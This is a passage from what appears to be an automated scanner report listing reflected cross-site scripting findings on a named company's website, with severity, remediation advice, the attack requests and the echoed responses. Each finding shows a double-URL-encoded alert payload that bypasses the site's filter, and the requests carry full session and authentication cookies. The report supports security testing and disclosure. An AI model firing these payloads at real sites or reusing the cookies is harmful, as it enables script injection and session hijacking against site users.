Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:31 GMT
Content-Length: 28940
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-scienceed503";alert(1)//10165721370/nutrition-research.html","E404") ;
   </script>
...[SNIP]...

1.570. http://www.sigmaaldrich.com/life-science/nutrition-research.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/nutrition-research.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 72705%2522%253balert%25281%2529%252f%252ffbce60f2f74 was submitted in the REST URL parameter 2. This input was echoed as 72705";alert(1)//fbce60f2f74 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-science/72705%2522%253balert%25281%2529%252f%252ffbce60f2f74 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:33 GMT
Content-Length: 28917
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-science/72705";alert(1)//fbce60f2f74","E404") ;
   </script>
...[SNIP]...

1.571. http://www.sigmaaldrich.com/life-science/proteomics.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/proteomics.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ecf7b%2522%253balert%25281%2529%252f%252f103fd00e32e was submitted in the REST URL parameter 1. This input was echoed as ecf7b";alert(1)//103fd00e32e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-scienceecf7b%2522%253balert%25281%2529%252f%252f103fd00e32e/proteomics.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:31 GMT
Content-Length: 28932
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-scienceecf7b";alert(1)//103fd00e32e/proteomics.html","E404") ;
   </script>
...[SNIP]...

1.572. http://www.sigmaaldrich.com/life-science/proteomics.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/proteomics.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload faa15%2522%253balert%25281%2529%252f%252ff8c67b482ac was submitted in the REST URL parameter 2. This input was echoed as faa15";alert(1)//f8c67b482ac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-science/faa15%2522%253balert%25281%2529%252f%252ff8c67b482ac HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:34 GMT
Content-Length: 28917
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-science/faa15";alert(1)//f8c67b482ac","E404") ;
   </script>
...[SNIP]...

1.573. http://www.sigmaaldrich.com/life-science/sigma-transgenics.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/sigma-transgenics.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa0f7%2522%253balert%25281%2529%252f%252fdbe768df677 was submitted in the REST URL parameter 1. This input was echoed as aa0f7";alert(1)//dbe768df677 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-scienceaa0f7%2522%253balert%25281%2529%252f%252fdbe768df677/sigma-transgenics.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:32 GMT
Content-Length: 28939
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-scienceaa0f7";alert(1)//dbe768df677/sigma-transgenics.html","E404") ;
   </script>
...[SNIP]...

1.574. http://www.sigmaaldrich.com/life-science/sigma-transgenics.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/sigma-transgenics.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cb5b4%2522%253balert%25281%2529%252f%252fec1a260ed13 was submitted in the REST URL parameter 2. This input was echoed as cb5b4";alert(1)//ec1a260ed13 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-science/cb5b4%2522%253balert%25281%2529%252f%252fec1a260ed13 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; 